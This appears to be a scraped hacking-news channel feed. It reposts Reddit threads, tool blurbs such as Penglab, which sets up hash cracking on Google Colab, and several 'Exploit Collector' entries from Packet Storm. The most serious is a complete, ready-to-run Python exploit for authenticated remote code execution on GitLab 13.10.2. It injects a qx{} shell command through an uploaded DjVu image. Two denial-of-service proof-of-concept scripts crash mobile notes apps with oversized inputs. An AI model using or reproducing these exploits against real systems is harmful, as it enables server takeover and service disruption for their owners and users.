Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How PUBG Mobile hacks/scripts are created |Learn to write LUA hacking scripts for latest version 1.o
https://cdn-images-1.medium.com/max/665/1*A_W7Prlb0PslvJ3UitvXvA.png
In our previous blog we have discussed about What are hacking scripts ? In which programming language scripts are created ? In this blog…
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
How PUBG Mobile hacks/scripts are created |Learn to write LUA hacking scripts for latest version 1.o
https://cdn-images-1.medium.com/max/665/1*A_W7Prlb0PslvJ3UitvXvA.png
In our previous blog we have discussed about What are hacking scripts ? In which programming language scripts are created ? In this blog…
Continue reading on Medium »
➖ Sent by @TheFeedReaderBot ➖
___________________________
@hacking_Attack
@Hacking_Video
Medium
How PUBG Mobile hacks/scripts are created |Learn to write LUA hacking scripts for latest version 1.4.0of PUBG mobile-Part 2
In our previous blog we have discussed about What are hacking scripts ? In which programming language scripts are created ? In this blog…
hacking: security in practice
imei
how to track a phone with an imei
submitted by /u/Shadowblue0
[link] [comments]
imei
how to track a phone with an imei
submitted by /u/Shadowblue0
[link] [comments]
reddit
imei
how to track a phone with an imei
hacking: security in practice
I have learnt of a data breach and the company is not doing anything
What do I do?
The breach is pretty big. The attackers have all their information, and all their clients information - which includes the clients' clients information (business AND personal and even medical).
I am a client, and my data was stolen.
The company providing the service is not doing anything. I know the hackers have contacted them (quite a while ago - months) with proof and they have not told their clients... now caused my data to be stolen.
I have contacted the company (based in USA) and at first they didn't believe me. Now they say they have raised it with legal and administration and will get back to me.
I'm not satisfied that this is being taken seriously.
What should I do next? Make this public somewhere? Report it somewhere? I'm not in the USA, so I'm not sure of the laws and procedures.
submitted by /u/Sly-D
[link] [comments]
I have learnt of a data breach and the company is not doing anything
What do I do?
The breach is pretty big. The attackers have all their information, and all their clients information - which includes the clients' clients information (business AND personal and even medical).
I am a client, and my data was stolen.
The company providing the service is not doing anything. I know the hackers have contacted them (quite a while ago - months) with proof and they have not told their clients... now caused my data to be stolen.
I have contacted the company (based in USA) and at first they didn't believe me. Now they say they have raised it with legal and administration and will get back to me.
I'm not satisfied that this is being taken seriously.
What should I do next? Make this public somewhere? Report it somewhere? I'm not in the USA, so I'm not sure of the laws and procedures.
submitted by /u/Sly-D
[link] [comments]
reddit
r/hacking - I have learnt of a data breach and the company is not doing anything
630 votes and 95 comments so far on Reddit
Hacking Articles Tips Tricks Videos Tutorials
GIF
Kali Linux Tutorials
Msldap : LDAP Library For Auditing MS AD
Msldap is a tool for (LDAP) LightWeight Directory Acess Protocol library for MS AD. Features Comes with a built-in console LDAP client All parameters can be conrolled via a conveinent URL (see below) Supports integrated windows authentication (SSPI) both with NTLM and with KERBEROS Supports channel binding (for ntlm and kerberos not SSPI) Supports encryption […]
The post Msldap : LDAP Library For Auditing MS AD appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Msldap : LDAP Library For Auditing MS AD
Msldap is a tool for (LDAP) LightWeight Directory Acess Protocol library for MS AD. Features Comes with a built-in console LDAP client All parameters can be conrolled via a conveinent URL (see below) Supports integrated windows authentication (SSPI) both with NTLM and with KERBEROS Supports channel binding (for ntlm and kerberos not SSPI) Supports encryption […]
The post Msldap : LDAP Library For Auditing MS AD appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Msldap : LightWeight Directory Acess Protocol Library
Msldap is a tool for (LDAP) LightWeight Directory Acess Protocol library for MS AD. Comes with a built-in console LDAP client
Penglab - Abuse Of Google Colab For Cracking Hashes
Abuse of Google Colab for fun and profit. What is it ? Penglab is a ready-to-install setup on Google Colab for cracking hashes with an incredible power, really useful for CTFs. (See benchmarks below.) It installs by default : Hashcat John Hydra SSH (with ngrok) And now, it can also : Launch an integrated shell Download the wordlists Rockyou and HashesOrg2019 quickly ! You only need a Google Account to use Google Colab, and to use ngrok for SSH (optional).How to use it ? Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU. Change the config by setting "True" at tools you want to install. Select "Runtime" and "Run all" ! What is Google Colab ? Google Colab is a free cloud service, based on Jupyter Notebooks for machine-learning education and research. It provides a runtime fully configured for deep learning and free-of-charge access to a robust GPU. Benchmarks Hashcat Benchmark : ====================* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCUOpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 NVIDIA Corporation========================================================================* Device #2: Tesla P100-PCIE-16GB, skippedBenchmark relevant options:===========================* --optimized-kernel-enableMinimum password length supported by kernel: 0Maximum password length supported by kernel: 55Hashmode: 0 - MD5Speed.#1.........: 27008.0 MH/s (69.17ms) @ Accel:64 Loops:512 Thr:1024 Vec:8Minimum password length supported by kernel: 0Maximum password length supported by kernel: 55Hashmode: 100 - SHA1Speed.#1.........: 9590.3 MH/s (48.61ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1Minimum password length supported by kernel: 0Maximum password length supported by kernel: 55 Speedtest : Testing from Google Cloud (35.203.136.151)... Retrieving speedtest.net server list... Selecting best server based on ping... Hosted by KamaTera INC (Santa Clara, CA) 11.95 km: 28.346 ms Testing download speed................................................................................ Download: 2196.68 Mbit/s Testing upload speed...................................................................................................... Upload: 3.87 Mbit/s Download Penglab
Read more...
Abuse of Google Colab for fun and profit. What is it ? Penglab is a ready-to-install setup on Google Colab for cracking hashes with an incredible power, really useful for CTFs. (See benchmarks below.) It installs by default : Hashcat John Hydra SSH (with ngrok) And now, it can also : Launch an integrated shell Download the wordlists Rockyou and HashesOrg2019 quickly ! You only need a Google Account to use Google Colab, and to use ngrok for SSH (optional).How to use it ? Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU. Change the config by setting "True" at tools you want to install. Select "Runtime" and "Run all" ! What is Google Colab ? Google Colab is a free cloud service, based on Jupyter Notebooks for machine-learning education and research. It provides a runtime fully configured for deep learning and free-of-charge access to a robust GPU. Benchmarks Hashcat Benchmark : ====================* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCUOpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 NVIDIA Corporation========================================================================* Device #2: Tesla P100-PCIE-16GB, skippedBenchmark relevant options:===========================* --optimized-kernel-enableMinimum password length supported by kernel: 0Maximum password length supported by kernel: 55Hashmode: 0 - MD5Speed.#1.........: 27008.0 MH/s (69.17ms) @ Accel:64 Loops:512 Thr:1024 Vec:8Minimum password length supported by kernel: 0Maximum password length supported by kernel: 55Hashmode: 100 - SHA1Speed.#1.........: 9590.3 MH/s (48.61ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1Minimum password length supported by kernel: 0Maximum password length supported by kernel: 55 Speedtest : Testing from Google Cloud (35.203.136.151)... Retrieving speedtest.net server list... Selecting best server based on ping... Hosted by KamaTera INC (Santa Clara, CA) 11.95 km: 28.346 ms Testing download speed................................................................................ Download: 2196.68 Mbit/s Testing upload speed...................................................................................................... Upload: 3.87 Mbit/s Download Penglab
Read more...
Google
Penglab.ipynb
Run, share, and edit Python notebooks
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
My Notes Safe 5.3 Denial Of Service
https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png
My Notes Safe version 5.3 suffers from a denial of service vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
My Notes Safe 5.3 Denial Of Service
https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png
My Notes Safe version 5.3 suffers from a denial of service vulnerability.
MD5 |
41ff462d29650978e92e573a5b0366bcDownload
# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
# Date: 06-04-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
# Version: 5.3
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Heap-Based Overflow Vulnerability In Sudo
https://4.bp.blogspot.com/-yl8JZs3kPK0/WWlvOF1SUeI/AAAAAAAAIMk/jv5-1ECzklsqpq4rMFWFx2wFFGh-Q9GlwCLcBGAs/s1600/h24.png
Whitepaper giving an overview of a heap-based buffer overflow in sudo.
MD5 |
Download
Source:packetstormsecurity.com
Heap-Based Overflow Vulnerability In Sudo
https://4.bp.blogspot.com/-yl8JZs3kPK0/WWlvOF1SUeI/AAAAAAAAIMk/jv5-1ECzklsqpq4rMFWFx2wFFGh-Q9GlwCLcBGAs/s1600/h24.png
Whitepaper giving an overview of a heap-based buffer overflow in sudo.
MD5 |
aa2fad3b8212022bdbf2ce1569c790b8Download
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Gitlab 13.10.2 Remote Code Execution
https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
Gitlab version 13.10.2 authenticated remote code execution exploit.
MD5 |
Download
Source:packetstormsecurity.com
Gitlab 13.10.2 Remote Code Execution
https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
Gitlab version 13.10.2 authenticated remote code execution exploit.
MD5 |
0cc1a2bd1cf9d33e81fc7b2b838ff7bfDownload
# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated)
# Date: 04/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.10.3
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.10.2 CE
# Credits: https://hackerone.com/reports/1154542
import requests
from bs4 import BeautifulSoup
import random
import os
import argparse
parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()
username = args.u
password = args.p
gitlab_url = args.t
command = args.c
session = requests.Session()
# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")
login_form = {
"authenticity_token": token,
"user[login]": username,
"user[password]": password,
"user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
if r.status_code != 200:
exit(f"Login Failed:{r.text}")
else:
print("Successfully Authenticated")
# payload creation
print("[2] Creating Payload ")
payload = f"\" . qx{{{command}}} . \\\n"
f1 = open("/tmp/exploit","w")
f1.write('(metadata\n')
f1.write(' (Copyright "\\\n')
f1.write(payload)
f1.write('" b ") )')
f1.close()
# Checking if djvumake is installed
check = os.popen('which djvumake').read()
if (check == ""):
exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin")
# Building the payload
os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit')
# Uploading it
print("[3] Creating Snippet and Uploading")
# Getting the CSRF token
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
csrf = soup.findAll('meta')[16].get("content")
cookies = {'_gitlab_session': session.cookies['_gitlab_session']}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);',
'Accept': 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': f'{gitlab_url}/projects',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'X-Requested-With': 'XMLHttpRequest',
'X-CSRF-Token': f'{csrf}'
}
files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})}
r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False)
if r.text != "Failed to process image\n":
exit("[-] Exploit failed")
else:
print("[+] RCE Triggered !!")
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Inkpad Notepad And To Do List 4.3.61 Denial Of Service
https://3.bp.blogspot.com/-8aNXwMYQICE/WWlvIs7ranI/AAAAAAAAILw/f2UnTjqyD14e3ZIoWuyFJjQ7Is9Nz7MtQCLcBGAs/s1600/h144.png
Inkpad Notepad and To Do List version 4.3.61 suffers from a denial of service vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Inkpad Notepad And To Do List 4.3.61 Denial Of Service
https://3.bp.blogspot.com/-8aNXwMYQICE/WWlvIs7ranI/AAAAAAAAILw/f2UnTjqyD14e3ZIoWuyFJjQ7Is9Nz7MtQCLcBGAs/s1600/h144.png
Inkpad Notepad and To Do List version 4.3.61 suffers from a denial of service vulnerability.
MD5 |
05dcb8bee0c6bd181999fca47c72c631Download
# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
# Date: 2021-06-03
# Author: Brian Rodríguez
# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
# Version: 4.3.61
# Category: DoS (Android)
##### Vulnerability #####
InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against Android 8.0.
##### PoC #####
--> payload.py
#!/usr/bin/env python
buffer = "\x41" * 50000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Chrome Legacy ipc::Message Passed Via Shared Memory
https://4.bp.blogspot.com/-f2P6cxL3l-g/WWlvB5J0BVI/AAAAAAAAIKc/5_BozSRH9sAdcCSQmN2ufmoLAOqLp1P9QCLcBGAs/s1600/h125.png
Looking at the Mojo implementation of Chrome's legacy IPC, the legacy ipc::Message type is transferred inside a BigBuffer.
MD5 |
Download
Source:packetstormsecurity.com
Chrome Legacy ipc::Message Passed Via Shared Memory
https://4.bp.blogspot.com/-f2P6cxL3l-g/WWlvB5J0BVI/AAAAAAAAIKc/5_BozSRH9sAdcCSQmN2ufmoLAOqLp1P9QCLcBGAs/s1600/h125.png
Looking at the Mojo implementation of Chrome's legacy IPC, the legacy ipc::Message type is transferred inside a BigBuffer.
MD5 |
1875fce290dce6b3abaf92746666dafaDownload
Source:packetstormsecurity.com